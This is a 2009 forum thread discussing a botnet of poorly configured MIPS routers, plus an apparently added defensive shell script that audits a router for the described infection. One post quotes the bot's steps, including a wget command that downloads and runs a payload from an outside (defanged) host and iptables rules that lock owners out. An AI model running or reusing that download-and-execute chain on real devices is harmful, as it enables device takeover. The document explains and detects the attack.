Free Republic

To: zeugma
OMFG! Do these people not even read industry news? For the past week, there has been all kinds of stories out there about botnets being built with freaking routers. What's the install base of Linksys routers running DD-WRT?  I mean come on! When are they going to give up on that 'security by obscurity' canard?

Yes, you have a good point. I hadn't myself heard about this router bot-net until I saw your post, but I did some research and it appears not only are we talking about a relatively small base of equipment, but the equipment has to be dangerously configured to even be vulnerable:

You are only vulnerable if:
  1. Your device is a mipsel (MIPS running in little-endian mode, this is what the worm is compiled for) device.
  2. Your device also has telnet, SSH or web-based interfaces available to the WAN, and
  3. Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.

As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots.

It does look like more than just DD-WRT routers are targeted; it appears to me that the exploitation method (once they have a root shell on a poorly configured machine) is fairly universal for any mipsel unit running most any Linux-based router code:

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &

udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process.


4 posted on 03/28/2009 1:17:42 AM PDT by snowsislander (NRA -- join today! 1-877-NRA-2000)
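The vulnerability conditions and infection steps quoted in the post above give a defender three things to check from a router's own shell: whether telnet, SSH or the web interface is bound to every interface (and so reachable from the WAN unless a rule in front of it says otherwise), whether the downloaded file the post names is sitting in /var/tmp, and whether the three DROP rules from the lockout step have appeared in the INPUT chain. The POSIX sh audit script below is an added example, not code from this thread or from the write-up it quotes. It uses only BusyBox-style netstat, iptables and awk; the netstat and iptables outputs embedded in it are constructed samples, and the file path, port numbers and rule shapes are taken from the post.

```shell
#!/bin/sh
# Router exposure/infection audit for the conditions described in the post.
# Added example; not from the thread or the write-up it quotes.
# Each check reads its input from stdin or an argument, so it can be run
# against live command output on the router or against saved output offline.

# Management ports named in the post: ssh (22), telnet (23), web (80).
MGMT_PORTS='22|23|80'

# exposed_mgmt_ports: reads `netstat -tln` output and prints each management
# port bound to all interfaces (0.0.0.0:port or :::port).
exposed_mgmt_ports() {
    awk -v ports="$MGMT_PORTS" '
        $1 ~ /^tcp/ && $NF == "LISTEN" {
            n = split($4, a, ":"); port = a[n]
            if ((a[1] == "0.0.0.0" || $4 ~ /^:::[0-9]+$/) && port ~ "^(" ports ")$")
                print port
        }'
}

# lockout_rules: reads `iptables -S INPUT` output and prints how many tcp
# DROP rules target the management ports. Three of them appearing on a box
# whose owner never added them matches the lockout step from the post.
lockout_rules() {
    awk -v ports="$MGMT_PORTS" '
        /^-A INPUT / && /-p tcp/ && /-j DROP/ {
            for (i = 1; i <= NF; i++)
                if ($i == "--dport" && $(i+1) ~ "^(" ports ")$") { n++; break }
        }
        END { print n + 0 }'
}

# dropper_present: true if the file the post names as the downloaded bot
# body exists and is executable. The path is an argument so the check can
# be exercised off the router; the default is the path from the post.
dropper_present() {
    p="${1:-/var/tmp/udhcpc.env}"
    [ -f "$p" ] && [ -x "$p" ]
}

# run_audit: run all three checks on the live system; returns 1 if any
# indicator is found so it can be used from cron or an init script.
run_audit() {
    found=0
    for p in $(netstat -tln 2>/dev/null | exposed_mgmt_ports); do
        echo "WARN: tcp/$p listens on all interfaces; bind or firewall it to the LAN side"
        found=1
    done
    n=$(iptables -S INPUT 2>/dev/null | lockout_rules)
    if [ "$n" -gt 0 ]; then
        echo "WARN: $n DROP rule(s) on management ports in INPUT; verify you added them"
        found=1
    fi
    if dropper_present; then
        echo "ALERT: /var/tmp/udhcpc.env present and executable"
        found=1
    fi
    return $found
}

# Constructed sample outputs for offline use of the checks above.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.1:80          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN
tcp        0      0 :::22                   :::*                    LISTEN'
SAMPLE_IPTABLES='-P INPUT ACCEPT
-A INPUT -i br0 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 23 -j DROP
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j DROP
-A INPUT -p udp -m udp --dport 53 -j DROP'

# Usage on the router:  sh audit.sh --live
if [ "${1:-}" = "--live" ]; then
    run_audit
fi
```

On the constructed samples the netstat check reports 23 and 22 (the web interface on 192.168.1.1 is LAN-only and is not flagged), and the iptables check counts the three tcp DROP rules while ignoring the udp one. The useful signal for the lockout rules is change over time: a router that does not expose management to the WAN should not acquire these rules on its own.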


To: snowsislander
Your comments are well taken. I mentioned the DD-WRT routers specifically, because those were what I'd seen mentioned, and is what I run, so I remembered it. I was initially worried about it until I heard the details of what was necessary for it to be vulnerable. If you run an externally facing system of any type and use default passwords you pretty much deserve to be p0wned. The point stands that the vulnerable number of systems is tiny compared to the installed base of completely unprotected Macs, yet these presstitutes still have the nerve to make those silly 'market share' arguments.

I don't even own a Mac, and have only even played with one a couple of times, but this kind of reporting chaps my ass.

6 posted on 03/28/2009 8:53:45 AM PDT by zeugma (Will it be nukes or aliens? Time will tell.)



FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson